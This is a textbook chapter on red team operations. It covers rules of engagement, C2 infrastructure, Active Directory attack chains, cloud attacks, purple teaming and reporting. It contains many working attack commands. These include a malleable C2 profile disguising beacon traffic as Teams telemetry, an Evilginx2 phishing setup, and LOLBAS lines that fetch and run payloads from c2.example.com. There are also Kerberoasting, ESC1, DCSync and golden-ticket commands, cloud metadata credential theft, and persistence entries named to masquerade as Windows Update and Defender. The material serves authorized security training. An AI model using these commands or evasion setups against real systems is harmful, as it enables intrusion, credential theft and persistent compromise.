Skip to content

Chapter 17: Red Team Operations

Overview

Red team operations represent the apex of adversarial simulation — structured, intelligence-driven campaigns that emulate real threat actors to stress-test an organization's people, processes, and technology. Unlike point-in-time penetration tests, red team engagements run for weeks or months, pursuing specific objectives (crown jewels) while evading detection. This chapter covers the full red team lifecycle, C2 infrastructure, Active Directory attack chains, cloud red teaming, purple team integration, and operational security.

Learning Objectives

By the end of this chapter, students SHALL be able to:

  1. Distinguish red team engagements from penetration tests and explain when each is appropriate
  2. Design covert C2 infrastructure that survives defender scrutiny
  3. Execute the full AD attack chain: initial access → Kerberoasting → lateral movement → DA
  4. Perform cloud red team operations across AWS, Azure, and GCP
  5. Structure purple team exercises using VECTR and Atomic Red Team
  6. Write executive and technical red team reports that drive remediation

Prerequisites

  • Completion of Chapter 16 (Penetration Testing)
  • Working knowledge of Active Directory architecture
  • Familiarity with at least one scripting language (Python, PowerShell, or Bash)
  • Understanding of TCP/IP networking and DNS

Why This Matters

In 2024, the average breach dwell time before detection was 194 days (Mandiant M-Trends). Real attackers are patient, methodical, and intelligence-driven. Red teams simulate this patience. If your blue team has never faced a multi-month adversary campaign with dedicated C2 infrastructure, they have never been truly tested. Every organization running critical infrastructure, holding sensitive data, or operating in regulated industries SHALL conduct full-scope red team operations at least annually.


17.1 Red Team vs. Penetration Test vs. Purple Team

The security testing landscape uses these terms loosely. Precision matters for scoping and budgeting.

Dimension Penetration Test Red Team Purple Team
Objective Find as many vulnerabilities as possible Test detection & response to a specific threat scenario Co-validate detection coverage with defenders
Duration Days–weeks Weeks–months Days (focused sprints)
Scope Agreed, narrow Broad / full enterprise Specific TTP sets
Blue team aware? Yes (white-box) or No (black-box) No (no-notice) Yes (collaborative)
Primary output Vulnerability list + PoC Objective attainment report + detection gaps Detection improvement delta
MITRE ATT&CK usage Technique mapping post-hoc Emulation plan pre-engagement Real-time TTP tracking
Ideal frequency Quarterly (by asset class) Annually or after major change Monthly sprints

17.1.1 The Engagement Spectrum

graph LR
    A[Assumed Breach\nTest] --> B[Penetration Test]
    B --> C[Red Team]
    C --> D[Advanced Persistent\nSimulation]
    D --> E[Nation-State\nEmulation]

    style A fill:#2d6a4f,color:#fff
    style B fill:#1d3557,color:#fff
    style C fill:#e63946,color:#fff
    style D fill:#780000,color:#fff
    style E fill:#370617,color:#fff

Assumed Breach tests start with credentials or shell access already granted — measuring lateral movement and IR response. Advanced Persistent Simulation uses a dedicated threat actor profile, custom tooling, and multi-stage infrastructure. Nation-State Emulation replicates a specific APT group (e.g., APT29/Cozy Bear) using that group's exact TTPs from MITRE ATT&CK.


A red team engagement without a signed, precise Rules of Engagement (RoE) document is a criminal act. The RoE SHALL define:

RULES OF ENGAGEMENT TEMPLATE
═══════════════════════════════════════════════════════
Engagement ID:      RT-YYYY-NNN
Client:             [Organization Legal Name]
Start/End Date:     YYYY-MM-DD to YYYY-MM-DD
Authorized Scope:   [IP ranges, domains, cloud accounts]
Out-of-Scope:       [Third-party SaaS, production payment systems]
Prohibited Actions: Ransomware deployment, data exfiltration >10MB,
                    destructive commands (rm/format/wipe), DoS
Emergency Stop:     Technical contacts with 24/7 phone numbers
Get-Out-of-Jail:    Emergency contact letter signed by CISO
Evidence Retention: 30 days post-engagement, then secure wipe
Data Handling:      All captured credentials/PII stored encrypted
Legal Jurisdiction: Governed by laws of [State/Country]
═══════════════════════════════════════════════════════

Third-Party Scope

Always verify that cloud providers, co-location facilities, and SaaS vendors are either in scope with their explicit written consent or explicitly out of scope. AWS, Azure, and GCP each have bug bounty and penetration testing policies that govern what is permissible.


17.3 Threat Intelligence-Driven Emulation Planning

World-class red teams do not pick TTPs randomly — they emulate the specific threat actors most likely to target the client based on industry, geography, and asset profile.

17.3.1 Emulation Planning Process

flowchart TD
    A[Threat Intelligence\nResearch] --> B[Threat Actor\nProfile Selection]
    B --> C[ATT&CK Navigator\nEmulation Layer]
    C --> D[TTP Priority\nRanking]
    D --> E[Tooling Selection\n& Custom Dev]
    E --> F[Infrastructure\nBuild-Out]
    F --> G[Engagement\nExecution]
    G --> H[Detection Gap\nAnalysis]
    H --> I[Purple Team\nValidation]

17.3.2 MITRE ATT&CK Emulation Plans

MITRE publishes free Adversary Emulation Plans for APT3, APT29, FIN6, menuPass, and others. Each plan maps: - Scenario (what the actor does) - Procedure (how they do it) - Detection opportunities (what logs fire) - Tools (public vs. custom)

ATT&CK Navigator allows layering multiple actor profiles and selecting the intersection to build a realistic composite emulation.


17.4 C2 Infrastructure Design

Command-and-control infrastructure is the nervous system of a red team. Poorly designed C2 is fingerprinted and burned within hours. Production-grade C2 SHALL incorporate domain fronting, redirectors, and operational security measures.

17.4.1 C2 Framework Comparison

Framework License Language Primary Use Beacon Protocol Detection Difficulty
Cobalt Strike Commercial ($5,900/seat) Java (server) Enterprise red teams HTTPS/DNS/SMB High with malleable C2
Sliver Open source Go Modern red teams mTLS/WireGuard/HTTP High (custom certs)
Havoc Open source Go/C Academic/research HTTPS/SMB Medium
Brute Ratel C4 Commercial C Targeted ops HTTPS Very high (EDR evasion)
Mythic Open source Python Purple teaming HTTP/WebSocket Configurable
Empire/Starkiller Open source Python PowerShell ops HTTPS Medium
Metasploit Open source Ruby Pen testing TCP/HTTPS Low (well-sighed)

17.4.2 Cobalt Strike Infrastructure Architecture

graph TB
    subgraph "Operator"
        OP[Operator Workstation]
        TS[Team Server\n:50050]
    end

    subgraph "Tier 1 Redirectors"
        R1[HTTPS Redirector\nApache mod_rewrite]
        R2[DNS Redirector\nsocat]
        R3[Domain Fronting\nCDN Edge Node]
    end

    subgraph "Tier 2 Long-Haul C2"
        LH[Long-Haul Domain\n30-day sleep]
    end

    subgraph "Target Environment"
        B1[Beacon — Workstation]
        B2[Beacon — Server]
        B3[SMB Beacon\nPeer-to-Peer]
    end

    OP --> TS
    TS --> R1
    TS --> R2
    TS --> R3
    R1 --> B1
    R2 --> B2
    R3 --> B3
    B1 --> B3
    LH -.->|Backup channel| B2

    style OP fill:#1d3557,color:#fff
    style TS fill:#1d3557,color:#fff
    style R1 fill:#2d6a4f,color:#fff
    style R2 fill:#2d6a4f,color:#fff
    style R3 fill:#2d6a4f,color:#fff
    style LH fill:#780000,color:#fff
    style B1 fill:#e63946,color:#fff
    style B2 fill:#e63946,color:#fff
    style B3 fill:#e63946,color:#fff

17.4.3 Malleable C2 Profiles

Malleable C2 profiles transform Cobalt Strike's network traffic to mimic legitimate applications. A profile mimicking Microsoft Teams telemetry:

set sleeptime "45000";
set jitter    "15";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Teams/1.6.00.4472";

http-get {
    set uri "/api/v2/telemetry/events";
    client {
        header "Accept"          "application/json, text/plain, */*";
        header "X-MS-Client-Request-Id" "a1b2c3d4-e5f6-7890-abcd-ef1234567890";
        header "X-Client-Type"   "desktop";
        header "X-Client-Version" "1.6.00.4472";
        metadata {
            base64url;
            parameter "correlationId";
        }
    }
    server {
        header "Content-Type"    "application/json";
        header "X-Content-Type-Options" "nosniff";
        output {
            base64url;
            prepend "{\"status\":200,\"data\":\"";
            append "\"}";
            print;
        }
    }
}

17.4.4 Operational Security (OPSEC)

OPSEC Requirement Implementation
Infrastructure attribution Register domains 60+ days before engagement via privacy-protected registrar
VPS attribution Pay via cryptocurrency; use VPS in jurisdiction different from engagement
TLS certificates Use Let's Encrypt with automated renewal; avoid self-signed
Logging All team server logs encrypted and retained per RoE
Credential hygiene Separate SSH keys per infrastructure component
Traffic All redirectors use HTTPS only; HTTP → HTTPS redirect
Domain categorization Categorize C2 domains as Finance/Healthcare/Tech before use
Kill date Hard-coded kill date in all implants

17.5 Initial Access

17.5.1 Phishing Infrastructure

A convincing phishing campaign requires:

  1. Domain — homoglyph (micros0ft.com) or typosquat (microsofft.com) categorized before launch
  2. Infrastructure — Evilginx2 (reverse proxy, harvests session tokens) or GoPhish (credential harvesting)
  3. Payload — HTML smuggling, ISO files (bypasses Mark-of-the-Web), LNK files
  4. Pretext — Contextually accurate lure (IT password reset, HR open enrollment, benefits renewal)
# Evilginx2 phishlet for Microsoft 365
phishlets hostname o365 login.microsoftonline.com.redteam.example.com
phishlets enable o365
lures create o365
lures get-url 0

17.5.2 Living-Off-the-Land Execution

LOLBAS (Living Off the Land Binaries and Scripts) — Windows:

# certutil.exe — download file (T1105)
certutil.exe -urlcache -split -f http://c2.example.com/payload.bin C:\Windows\Temp\p.bin

# mshta.exe — execute HTA payload (T1218.005)
mshta.exe http://c2.example.com/payload.hta

# regsvr32 — squiblydoo bypass (T1218.010)
regsvr32.exe /s /n /u /i:http://c2.example.com/file.sct scrobj.dll

# odbcconf — execute DLL (T1218.008)
odbcconf.exe /A {REGSVR C:\path\to\payload.dll}

17.6 Active Directory Attack Chain

17.6.1 AD Enumeration with BloodHound

BloodHound visualizes attack paths through Active Directory using graph theory.

# SharpHound collection (from Windows target)
Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Temp\

# BloodHound CE via Docker
docker run -p 7474:7474 -p 8080:8080 specterops/bloodhound-community-edition

# BloodHound queries for high-value paths
# Find shortest path to Domain Admins
MATCH p=shortestPath((u:User)-[*1..]->(g:Group {name:"DOMAIN ADMINS@CORP.LOCAL"}))
WHERE u.enabled=true RETURN p LIMIT 10

# Find all Kerberoastable users with high-value privileges
MATCH (u:User {hasspn:true})-[:MemberOf*1..]->(g:Group)
WHERE g.highvalue=true
RETURN u.name, u.serviceprincipalnames

17.6.2 Kerberoasting

Kerberoasting requests service tickets for SPNs and cracks them offline. Service accounts often have weak passwords set years ago and never rotated.

# Request all TGS tickets (PowerView)
Invoke-Kerberoast -OutputFormat Hashcat | Export-Csv C:\Temp\kerb.csv

# Using Rubeus
.\Rubeus.exe kerberoast /format:hashcat /outfile:C:\Temp\hashes.txt

# Crack offline with hashcat
hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt -r best64.rule

Detection: Event ID 4769 (Kerberos Service Ticket Requested) with EncryptionType = 0x17 (RC4) for accounts that are not computer accounts.

17.6.3 AS-REP Roasting

Targets accounts with Kerberos pre-authentication disabled.

# Impacket (from Linux)
python3 GetNPUsers.py CORP/ -usersfile users.txt -format hashcat -outputfile asrep.txt -dc-ip 10.10.10.10

# Crack
hashcat -m 18200 asrep.txt rockyou.txt

17.6.4 Active Directory Certificate Services — ESC1

ADCS ESC1 allows any domain user to request a certificate as a privileged account if the template: - Allows requestor to supply a Subject Alternative Name (SAN) - Enrolls Client Authentication EKU - Manager approval is not required

# Enumerate vulnerable templates (Certify)
.\Certify.exe find /vulnerable

# Request cert as Domain Admin (ESC1)
.\Certify.exe request /ca:CORP-CA\corp-DC01-CA /template:VulnerableTemplate /altname:administrator

# Convert PEM to PFX
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out admin.pfx

# Pass-the-Certificate with Rubeus
.\Rubeus.exe asktgt /user:administrator /certificate:admin.pfx /password:password /ptt

17.6.5 DCSync Attack

With DS-Replication-Get-Changes-All permission, an account can replicate the NTDS.dit — dumping all password hashes without touching the domain controller disk.

# Mimikatz DCSync
lsadump::dcsync /domain:corp.local /user:krbtgt

# Impacket secretsdump
python3 secretsdump.py CORP/user:password@10.10.10.10 -just-dc-ntlm

# BloodHound: find accounts with DCSync rights
MATCH (u)-[:DCSync|AllExtendedRights|GenericAll]->(d:Domain)
RETURN u.name

17.6.6 Golden Ticket

After obtaining the krbtgt hash via DCSync, forge Kerberos tickets valid for up to 10 years.

# Forge Golden Ticket (Mimikatz)
kerberos::golden /user:ImaginaryUser /domain:corp.local /sid:S-1-5-21-... /krbtgt:HASH /id:500 /ptt

# Or with Impacket ticketer
python3 ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-... -domain corp.local administrator
export KRB5CCNAME=administrator.ccache
python3 psexec.py -k -no-pass corp.local/administrator@dc01.corp.local

17.6.7 AD Attack Chain Summary

flowchart LR
    A[Initial Access\nPhishing/VPN Creds] --> B[Local Enum\nwhoami/net user/ipconfig]
    B --> C[Domain Enum\nBloodHound/PowerView]
    C --> D{Privileged\nPath?}
    D -->|Kerberoastable SPN| E[Kerberoast → Crack]
    D -->|ADCS ESC1| F[Certificate Abuse]
    D -->|Delegation| G[Unconstrained\nDelegation Attack]
    E --> H[Service Account\nCompromise]
    F --> I[Impersonate DA\nwith Certificate]
    G --> J[Capture TGT via\nSpoolSample/PetitPotam]
    H --> K[Lateral Movement\nPass-the-Hash/Pass-the-Ticket]
    I --> K
    J --> K
    K --> L[High-Value Target\nExchange/File Server]
    L --> M[DCSync\nkrbtgt hash]
    M --> N[Golden Ticket\nPersistence]
    N --> O[OBJECTIVE\nCrown Jewel Access]

    style O fill:#e63946,color:#fff
    style M fill:#780000,color:#fff
    style N fill:#780000,color:#fff

17.7 Cloud Red Teaming

17.7.1 AWS Red Team Techniques

# Enumerate AWS identity
aws sts get-caller-identity
aws iam list-attached-user-policies --user-name $(aws iam get-user --query User.UserName --output text)

# Pacu — AWS exploitation framework
python3 pacu.py
Pacu> import_keys AKIAIOSFODNN7EXAMPLE
Pacu> run iam__enum_permissions
Pacu> run iam__privesc_scan

# SSRF to IMDSv1 (instance metadata)
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/

# S3 enumeration for public buckets
aws s3 ls s3://target-bucket --no-sign-request
python3 slurp.py -t target-org -o output.txt

# Lambda privilege escalation
# If lambda:CreateFunction + iam:PassRole + lambda:InvokeFunction
aws lambda create-function \
  --function-name priv-esc \
  --runtime python3.11 \
  --role arn:aws:iam::123456789:role/AdminRole \
  --handler index.handler \
  --zip-file fileb://payload.zip

17.7.2 Azure Red Team Techniques

# ROADtools — Azure AD enumeration
python3 roadrecon.py auth -u user@corp.onmicrosoft.com -p Password123
python3 roadrecon.py gather
python3 roadrecon.py dump

# Azure AD enumeration (AADInternals)
Import-Module AADInternals
Get-AADIntLoginInformation -UserName user@corp.onmicrosoft.com
Invoke-AADIntReconAsOutsider -DomainName corp.com

# Azure Pass-the-PRT (Primary Refresh Token)
# Extract PRT from AzureAD-joined device
Invoke-AADIntDeviceEnrollment
Get-AADIntUserPRTToken

# Service Principal abuse
az login --service-principal -u APP_ID -p PASSWORD --tenant TENANT_ID
az role assignment list --all | grep -i "Owner\|Contributor"
az keyvault secret list --vault-name target-vault

17.7.3 GCP Red Team

# Enumerate IAM permissions
gcloud projects get-iam-policy PROJECT_ID --flatten="bindings[].members" --format="table(bindings.role)"

# Service Account key extraction
gcloud iam service-accounts keys list --iam-account=sa@project.iam.gserviceaccount.com

# Metadata server (SSRF equivalent)
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" \
  -H "Metadata-Flavor: Google"

# Cloud Storage public buckets
gsutil ls gs://target-bucket/ --no-auth

17.8 Lateral Movement Techniques

Technique ATT&CK ID Tool Detection
Pass-the-Hash T1550.002 Mimikatz, CrackMapExec Event 4624 logon type 3 with NTLMv1 from unusual host
Pass-the-Ticket T1550.003 Rubeus, impacket Event 4768/4769 from unusual IP
Overpass-the-Hash T1550.002 Mimikatz Event 4648 explicit credential logon
WMI Execution T1047 wmic, impacket wmiexec Event 4688 wmic.exe; WMI subscription creation
PSExec T1569.002 PsExec, impacket Named pipe ADMIN$; service PSEXESVC created
SMB with valid creds T1021.002 smbclient, net use Event 4624 logon type 3
SSH tunneling T1572 ssh -D / -L Anomalous SSH connections to internal hosts
DCOM T1021.003 impacket dcomexec Event 4688 mmc.exe, excel.exe spawning children
RDP T1021.001 mstsc, xfreerdp Event 4624 logon type 10 from unusual IP

17.9 Persistence Mechanisms

# Scheduled task (T1053.005)
schtasks /create /tn "WindowsUpdate" /tr "C:\Windows\Temp\payload.exe" /sc daily /st 09:00 /ru SYSTEM

# WMI event subscription (T1546.003)
$filter = Set-WmiInstance -Class __EventFilter -Namespace root/subscription \
  -Arguments @{Name="WindowsUpdateFilter"; EventNamespace="root/cimv2"; \
  QueryLanguage="WQL"; Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"}

# Registry run key (T1547.001)
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" \
  -Name "WindowsDefender" -Value "C:\Windows\Temp\payload.exe"

# Golden ticket (see 17.6.6 above)
# Silver ticket — forge TGS for specific service
kerberos::golden /user:fakeuser /domain:corp.local /sid:S-1-5-21-... \
  /target:fileserver.corp.local /service:cifs /rc4:SERVICE_HASH /ptt

17.10 Purple Team Operations

Purple team is not a separate team — it is a methodology where red and blue collaborate openly to validate detection coverage in real time.

17.10.1 Purple Team Workflow

sequenceDiagram
    participant R as Red Team
    participant P as Purple Facilitator
    participant B as Blue Team/SOC

    R->>P: Select TTP from ATT&CK Navigator
    P->>B: Brief: "We will execute T1059.001 in 5 min"
    R->>R: Execute PowerShell technique
    B->>P: Report: Alert fired / No alert
    P->>P: Log result in VECTR
    alt No alert
        P->>B: Tune detection rule together
        R->>R: Re-execute technique
        B->>P: Confirm detection now fires
    end
    P->>P: Mark TTP as validated/remediated
    Note over R,B: Repeat for each TTP in emulation plan

17.10.2 VECTR Tracking

VECTR (vectr.io) is the standard platform for tracking purple team exercise results.

# VECTR campaign structure
Campaign: APT29 Emulation Q1-2026
  Assessment Groups:
    - Initial Access (T1566, T1195)
    - Execution (T1059.001, T1059.003)
    - Persistence (T1053.005, T1547.001)
    - Lateral Movement (T1550.002, T1021.001)
    - Collection (T1039, T1074)
    - Exfiltration (T1041, T1048)

  Metrics:
    - Detection Rate: 23/40 TTPs = 57.5%
    - Prevention Rate: 8/40 = 20%
    - Visibility Gap: 17/40 = 42.5%

17.10.3 Atomic Red Team

Atomic Red Team (github.com/redcanaryco/atomic-red-team) provides single-TTP test cases mapped directly to ATT&CK.

# Install Invoke-AtomicRedTeam
Install-Module -Name invoke-atomicredteam,powershell-yaml -Scope CurrentUser
Import-Module invoke-atomicredteam

# Run a specific atomic test
Invoke-AtomicTest T1059.001 -TestNumbers 1  # PowerShell execution test
Invoke-AtomicTest T1003.001 -TestNumbers 1  # LSASS memory dump

# Check prerequisites
Invoke-AtomicTest T1059.001 -CheckPrereqs

# Generate Sigma detection rule for technique
Get-AtomicTechnique -Technique T1059.001 | Select-Object -ExpandProperty atomic_tests

17.11 Reporting

17.11.1 Red Team Report Structure

EXECUTIVE SUMMARY (1–2 pages)
├── Objective and Scope
├── Simulated Threat Actor: [Name/Profile]
├── Overall Risk Rating: CRITICAL / HIGH / MEDIUM
├── Objectives Achieved: 3/4
├── Dwell Time Before Detection: 23 days
└── Top 3 Critical Findings

NARRATIVE (5–10 pages)
├── Phase 1: Initial Access
│   ├── Method: Spearphishing with ISO lure
│   ├── Date/Time: YYYY-MM-DD HH:MM
│   └── Evidence: Screenshot/log snippet
├── Phase 2: Establish Foothold
...

DETECTION ANALYSIS
├── TTPs Executed: 40
├── TTPs Detected: 9 (22.5%)
├── TTPs Prevented: 4 (10%)
├── Blind Spots: 27 (67.5%)
└── Detection Latency: Avg 4.2 hours

FINDINGS (one per crown jewel or critical path)
├── RED-001: ADCS ESC1 Allows Low-Privileged Certificate for DA
├── RED-002: DCSync Rights Granted to 4 Non-DA Accounts
└── RED-003: No Detection for Kerberoasting (47 SPNs enumerated undetected)

RECOMMENDATIONS
└── Prioritized remediation roadmap with effort/impact matrix

APPENDICES
├── A: IOC List (hashes, IPs, domains used)
├── B: ATT&CK Navigator Layer
├── C: Full Timeline
└── D: Evidence Repository Index

17.12 Benchmark Controls

Control ID Title Red Team Relevance
Nexus SecOps-RT-01 Red Team Program Establishment Annual full-scope red team engagement
Nexus SecOps-RT-02 C2 Detection Capability Detect beaconing, DNS tunneling, domain fronting
Nexus SecOps-RT-03 AD Attack Path Hardening Kerberoasting mitigations, ADCS template audit
Nexus SecOps-RT-04 Purple Team Cadence Monthly purple team sprints with VECTR tracking
Nexus SecOps-RT-05 Cloud Red Team Coverage Cloud control plane attacks included in scope
Nexus SecOps-RT-06 Initial Access Simulation Phishing simulation ≥2/year with click-rate tracking

Exam Prep & Certifications

Relevant Certifications

The topics in this chapter align with the following certifications:

  • OSCP — Domains: Penetration Testing, Active Directory Attacks
  • GIAC GPEN — Domains: Penetration Testing, Red Team Operations
  • CompTIA PenTest+ — Domains: Attacks, Post-Exploitation, Reporting

View full Certifications Roadmap →

Key Terms

Beacon — A lightweight implant that periodically calls back to a C2 server to receive tasking. Beacons use configurable sleep timers and jitter to evade behavioral analysis.

BloodHound — Graph-based Active Directory attack path analysis tool. Uses SharpHound collectors to ingest AD data and Neo4j to visualize relationships.

DCSync — Technique that abuses the Directory Replication Service Remote Protocol (DRSR) to request password hashes from a domain controller without logging on to it.

Domain Fronting — Technique using a CDN's infrastructure to disguise C2 traffic as legitimate requests to a trusted domain (e.g., Google, Cloudflare).

Golden Ticket — Forged Kerberos TGT signed with the krbtgt account hash, granting persistent, difficult-to-revoke Domain Admin access.

Kerberoasting — Offline cracking attack that requests service tickets for accounts with SPNs and cracks the RC4/AES-encrypted tickets.

Malleable C2 — A Cobalt Strike feature allowing the operator to fully customize the network characteristics of beacon traffic to mimic legitimate application protocols.

Purple Team — A collaborative security testing methodology where red and blue teams work together openly to validate and improve detection capabilities.

VECTR — Visualization, Execution, and Tracking for Testing and Reporting — an open-source platform for managing purple team exercise results.